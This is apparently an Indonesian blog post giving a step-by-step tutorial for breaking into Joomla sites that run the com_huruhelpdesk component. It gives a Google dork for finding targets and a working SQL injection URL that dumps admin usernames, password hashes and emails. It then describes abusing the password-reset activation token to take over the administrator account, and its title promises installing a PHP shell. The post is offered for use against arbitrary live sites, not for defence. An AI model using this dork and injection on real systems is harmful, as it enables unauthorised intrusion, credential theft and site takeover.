**************************************************************************************
* title : exploit joomla : com_huruhelpdesk + reset password + pasang php shell
==========
[+] step 1
==========
buka google.. ketik keyword
"inurl:/index.php?option=com_huruhelpdesk\"
tes satu per satu
coba kita ambil yang ini
==========
[+] step 2
==========
pasang exploit..
==========
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users-- tu admin nya... :Pnampak..
==========
[+] step 3
==========
coba kita reset password nya
/index.php?option=com_user&view=reset ==========
[+] step 4
==========
minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya
tu kluar activatifasinya
hehehe
:)
lanjut...
copas aja ke yang tadi.. enter.. :)
==========
[+] step 5
==========
copas aja ke yang tadi.. enter.. :)
:P
==========
[+] step 6
==========
wkwkkw
minta pasword baru tu.. kasih aja..
hehhehe
==========
[+] step 7
==========
OK langsung aja masuk ke admin nya..
:)
http://[site]/[pacth]/administrator
silakan kreasikan sendiri :)
1:39 AM
gilang
0 comments :
Post a Comment